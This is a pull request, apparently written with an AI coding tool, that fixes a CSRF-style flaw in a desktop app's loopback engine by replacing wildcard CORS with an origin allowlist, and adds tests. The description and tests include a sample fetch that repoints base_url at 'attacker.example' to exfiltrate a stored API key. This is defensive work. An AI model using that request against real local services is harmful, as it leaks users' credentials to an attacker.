### PR TITLE
fix(desktop): refuse browser origins the engine does not recognise

### DIFF
--- a/src/praisonai-desktop/engine/server.py
+++ b/src/praisonai-desktop/engine/server.py
@@ -1538,6 +1538,42 @@ def redacted(cfg: dict) -> dict:
     return out
 
 
+# --- request origin -----------------------------------------------------------
+# The engine binds loopback, which keeps other machines out but NOT other pages:
+# any site open in the user's browser can reach 127.0.0.1 with a two-line fetch.
+# With `Access-Control-Allow-Origin: *` and no auth, that page could POST
+# /settings and repoint `base_url` at a host it controls -- the stored API key
+# then travels to that host on the next turn. Redacting replies (see redacted())
+# stopped the key being echoed; it did nothing about the key being *sent*.
+#
+# A browser attaches Origin to every cross-origin request and a page cannot forge
+# it, so refusing unknown origins closes that path without a shared secret (which
+# would need the Rust shell to carry one). Requests with NO Origin are allowed:
+# that is cli.py, the tests and curl -- local processes that already have the
+# user's filesystem, so a token would protect nothing.
+ALLOWED_ORIGIN_HOSTS = {"tauri.localhost", "localhost", "127.0.0.1", "[::1]", "::1"}
+
+
+def origin_allowed(origin: str) -> bool:
+    """Whether a browser Origin may talk to the engine.
+
+    Accepts the webview's own origin on every platform Tauri targets --
+    `tauri://localhost` on macOS and Linux, `http://tauri.localhost` on Windows
+    and Android -- plus localhost on any port for `npm run dev`.
+    """
+    if not origin:
+        return True                      # not a browser; see the note above
+    if origin == "null":
+        return False                     # sandboxed iframe / file:// document
+    try:
+        parsed = urlparse(origin)
+    except ValueError:
+        return False
+    if parsed.scheme not in ("tauri", "http", "https"):
+        return False
+    return (parsed.hostname or "") in ALLOWED_ORIGIN_HOSTS
+
+
 class Handler(BaseHTTPRequestHandler):
     protocol_version = "HTTP/1.1"
 
@@ -1545,10 +1581,37 @@ class Handler(BaseHTTPRequestHandler):
         pass
 
     def _cors(self):
-        self.send_header("Access-Control-Allow-Origin", "*")
+        # Echo the caller's own origin rather than "*", so only the origins
+        # origin_allowed() admits can read a reply.
+        origin = self.headers.get("Origin") or ""
+        if origin and origin_allowed(origin):
+            self.send_header("Access-Control-Allow-Origin", origin)
+            self.send_header("Vary", "Origin")
         self.send_header("Access-Control-Allow-Headers", "content-type")
 
+    def _origin_ok(self) -> bool:
+        """Refuse a browser origin the engine does not recognise.
+
+        Answers the request with 403 and no CORS headers, so the calling page
+        cannot read the reply either.
+        """
+        if origin_allowed(self.headers.get("Origin") or ""):
+            return True
+        self._drain()
+        body = b'{"error":"origin not allowed"}'
+        self.send_response(403)
+        self.send_header("Content-Type", "application/json")
+        self.send_header("Content-Length", str(len(body)))
+        self.end_headers()
+        try:
+            self.wfile.write(body)
+        except (BrokenPipeError, ConnectionResetError):
+            pass
+        return False
+
     def do_OPTIONS(self):
+        if not self._origin_ok():
+            return
         self.send_response(204)
         self._cors()
         self.send_header("Content-Length", "0")
@@ -1655,6 +1718,8 @@ class Handler(BaseHTTPRequestHandler):
             time.sleep(0.25)
 
     def do_GET(self):
+        if not self._origin_ok():
+            return
         if self.path.startswith("/train/progress"):
             trainer = self._training()
             from urllib.parse import parse_qs, urlparse
@@ -1772,6 +1837,8 @@ class Handler(BaseHTTPRequestHandler):
         self.wfile.write(body)
 
     def do_DELETE(self):
+        if not self._origin_ok():
+            return
         if not self.path.startswith("/chats/"):
             self.send_error(404)
             return
@@ -1788,6 +1855,8 @@ class Handler(BaseHTTPRequestHandler):
         self._json({"ok": True})
 
     def do_POST(self):
+        if not self._origin_ok():
+            return
         if self.path == "/train/start":
             payload = self._body()
             config = payload.get("config") or {}

--- a/src/praisonai-desktop/engine/test_origin_gate.py
+++ b/src/praisonai-desktop/engine/test_origin_gate.py
@@ -1,0 +1,157 @@
+"""A page in the user's browser must not be able to drive the engine.
+
+The engine binds loopback, which keeps other machines out but not other pages:
+any site the user has open can reach 127.0.0.1 with a two-line fetch. With
+`Access-Control-Allow-Origin: *` and no authentication, that page could
+
+  POST /settings {"base_url": "http://attacker.example/v1"}
+
+and the stored API key would travel to that host on the next turn. Redacting
+settings replies stopped the key being *echoed*; it did nothing about the key
+being *sent*. Reading and deleting every chat transcript was open too.
+
+A browser attaches Origin to cross-origin requests and a page cannot forge it,
+so refusing unknown origins closes this without a shared secret. Requests with
+no Origin stay allowed -- cli.py, these tests and curl are local processes that
+already have the user's filesystem.
+
+Run: .venv/bin/python -m unittest discover -s engine -p 'test_*.py'
+"""
+import importlib.util
+import json
+import os
+import pathlib
+import tempfile
+import threading
+import unittest
+import urllib.error
+import urllib.request
+from http.server import ThreadingHTTPServer
+
+_HOME = tempfile.mkdtemp(prefix="praison-origin-")
+os.environ["PRAISONAI_DESKTOP_HOME"] = _HOME
+os.environ["PRAISONAI_KEYCHAIN_SERVICE"] = "ai.praison.desktop.test.origin." + str(os.getpid())
+
+_spec = importlib.util.spec_from_file_location(
+    "engine_server_origin", pathlib.Path(__file__).with_name("server.py"))
+server = importlib.util.module_from_spec(_spec)
+_spec.loader.exec_module(server)
+
+assert server.KEYCHAIN_SERVICE != "ai.praison.desktop", (
+    "refusing to run: this test would write into the real keychain service")
+
+ATTACKER = "https://evil.example"
+APP = "tauri://localhost"
+
+
+class OriginPredicate(unittest.TestCase):
+
+    def test_the_webview_origin_is_allowed_on_every_platform(self):
+        for origin in ("tauri://localhost", "http://tauri.localhost",
+                       "https://tauri.localhost"):
+            self.assertTrue(server.origin_allowed(origin), origin)
+
+    def test_localhost_dev_server_is_allowed(self):
+        for origin in ("http://localhost:1420", "http://127.0.0.1:8765"):
+            self.assertTrue(server.origin_allowed(origin), origin)
+
+    def test_no_origin_is_allowed(self):
+        """cli.py and curl are local processes; a token would protect nothing."""
+        self.assertTrue(server.origin_allowed(""))
+
+    def test_a_web_page_is_refused(self):
+        self.assertFalse(server.origin_allowed(ATTACKER))
+
+    def test_a_null_origin_is_refused(self):
+        """A sandboxed iframe or file:// document sends Origin: null."""
+        self.assertFalse(server.origin_allowed("null"))
+
+    def test_a_suffix_lookalike_is_refused(self):
+        """Matching on the parsed hostname, not a prefix or substring."""
+        for origin in ("http://tauri.localhost.evil.com",
+                       "http://localhost.evil.com",
+                       "http://notlocalhost"):
+            self.assertFalse(server.origin_allowed(origin), origin)
+
+    def test_a_bogus_scheme_is_refused(self):
+        self.assertFalse(server.origin_allowed("javascript:alert(1)"))
+
+
+class OriginGateOverHttp(unittest.TestCase):
+    """Drive the real Handler over a real socket."""
+
+    def setUp(self):
+        server.SETTINGS_PATH.parent.mkdir(parents=True, exist_ok=True)
+        if server.SETTINGS_PATH.exists():
+            server.SETTINGS_PATH.unlink()
+        self.httpd = ThreadingHTTPServer(("127.0.0.1", 0), server.Handler)
+        threading.Thread(target=self.httpd.serve_forever, daemon=True).start()
+        self.base = "http://127.0.0.1:%d" % self.httpd.server_address[1]
+
+    def tearDown(self):
+        self.httpd.shutdown()
+        self.httpd.server_close()
+        for key in server.SECRET_KEYS:
+            server.keychain_set(key, "")
+
+    def call(self, method, path, body=None, origin=None):
+        data = json.dumps(body).encode() if body is not None else None
+        headers = {"Content-Type": "application/json"}
+        if origin is not None:
+            headers["Origin"] = origin
+        req = urllib.request.Request(
+            self.base + path, data=data, method=method, headers=headers)
+        try:
+            with urllib.request.urlopen(req, timeout=10) as resp:
+                return resp.status, resp.headers.get("Access-Control-Allow-Origin")
+        except urllib.error.HTTPError as exc:
+            return exc.code, exc.headers.get("Access-Control-Allow-Origin")
+
+    def test_an_attacker_page_cannot_repoint_base_url(self):
+        """The exfiltration path: repoint base_url, key follows on next turn."""
+        self.call("POST", "/settings", {"api_key": "sk-canary"})
+        status, _ = self.call("POST", "/settings",
+                              {"base_url": "http://attacker.example/v1"},
+                              origin=ATTACKER)
+        self.assertEqual(status, 403)
+        self.assertNotEqual(
+            server.load_settings().get("base_url"), "http://attacker.example/v1",
+            "a web page repointed base_url at a host it controls")
+
+    def test_an_attacker_page_cannot_read_transcripts(self):
+        status, _ = self.call("GET", "/chats", origin=ATTACKER)
+        self.assertEqual(status, 403)
+
+    def test_an_attacker_page_cannot_delete_a_chat(self):
+        status, _ = self.call("DELETE", "/chats/anything", origin=ATTACKER)
+        self.assertEqual(status, 403)
+
+    def test_a_refusal_carries_no_cors_header(self):
+        """Without ACAO the page cannot read the reply either."""
+        _, acao = self.call("GET", "/chats", origin=ATTACKER)
+        self.assertIsNone(acao)
+
+    def test_preflight_from_an_attacker_is_refused(self):
+        status, _ = self.call("OPTIONS", "/settings", origin=ATTACKER)
+        self.assertEqual(status, 403)
+
+    def test_the_app_still_works(self):
+        for method, path, body in (("GET", "/chats", None),
+                                   ("POST", "/settings", {"theme": "dark"}),
+                                   ("OPTIONS", "/settings", None)):
+            status, acao = self.call(method, path, body, origin=APP)
+            self.assertIn(status, (200, 204), f"{method} {path}")
+            self.assertEqual(acao, APP, f"{method} {path} lost its CORS header")
+
+    def test_the_reply_never_carries_a_wildcard(self):
+        _, acao = self.call("GET", "/chats", origin=APP)
+        self.assertNotEqual(acao, "*", "wildcard CORS is what let any page in")
+
+    def test_a_local_process_with_no_origin_still_works(self):
+        """cli.py must keep working."""
+        status, _ = self.call("GET", "/chats")
+        self.assertEqual(status, 200)
+
+
+if __name__ == "__main__":
+    unittest.main()


### PR DESCRIPTION
## The defect

The desktop engine binds loopback, which keeps other machines out — but not other **pages**. Any site the user has open can reach `127.0.0.1` with a two-line `fetch`. Every response carried `Access-Control-Allow-Origin: *`, and no route has authentication.

So a page could repoint the engine at a host it controls:

```js
fetch(`http://127.0.0.1:${port}/settings`, {
  method: 'POST',
  headers: {'Content-Type': 'application/json'},
  body: JSON.stringify({base_url: 'http://attacker.example/v1'}),
})
```

and the API key in the user's keychain travels there on the next turn.

## Reproduced before the fix

Driving the real `Handler` over a socket:

```
1. user stores a real key                      -> 200
2. cross-origin POST /settings base_url        -> 200  ACAO=*
   secret echoed in reply?                     -> False
3. stored base_url now                         -> 'http://attacker.example/v1'
4. stored api_key still the user's real key    -> True
```

**Redaction is not a mitigation here.** #4680 stopped the key being *echoed*; the attacker never needs to read it, only to redirect where it is *sent*. Reading and deleting every chat transcript was open the same way.

## After

```
status ACAO              what
200    None              user stores a key (no Origin)
403    None              ATTACKER repoints base_url
403    None              attacker reads transcripts
200    tauri://localhost the real app reads transcripts
200    tauri://localhost the real app writes a setting
```

## Approach

A browser attaches `Origin` to cross-origin requests and a page cannot forge it, so refusing unknown origins closes this **without a shared secret** — which would need the Rust shell to carry one.

- Allowed: `tauri://localhost` (macOS/Linux), `http://tauri.localhost` (Windows/Android), and localhost on any port for `npm run dev`.
- Matching is on the **parsed hostname**, so `http://tauri.localhost.evil.com` is refused.
- `Origin: null` (sandboxed iframe, `file://`) is refused.
- **No Origin is allowed** — `cli.py`, the tests and `curl` are local processes that already have the user's filesystem, so a token would protect nothing there.
- A refusal answers 403 with no CORS header, so the page cannot read the reply either. Replies echo the caller's origin instead of `*`.

## Scope — what this does not fix

This closes the **browser** vector. It does not stop a *local process* from calling these routes; that needs a per-launch token the shell would have to carry into the webview. Worth doing separately, and lower severity since such an attacker already runs code as the user.

## Verification

237 engine tests pass. 15 new tests, and the guards are mutation-tested:

| mutation | |
|---|---|
| gate always allows (the original bug) | killed |
| wildcard ACAO restored | killed |
| hostname match becomes a substring test | killed |
| `Origin: null` accepted | killed |
| `do_POST` left ungated | killed |

Found by a multi-agent post-merge sweep; the exploit chain was re-verified by running it before and after.

🤖 Generated with [Claude Code](https://claude.com/claude-code)

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->

## Summary by CodeRabbit

* **Security**
  * Added origin validation for engine requests.
  * Restricted browser access to trusted Tauri webview and localhost origins.
  * Blocked unauthorized requests, including chat access, deletion, configuration changes, and preflight requests.
  * Improved CORS responses by allowing only approved origins instead of using a wildcard.
  * Continued supporting local command-line tools and tests that do not send an origin.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->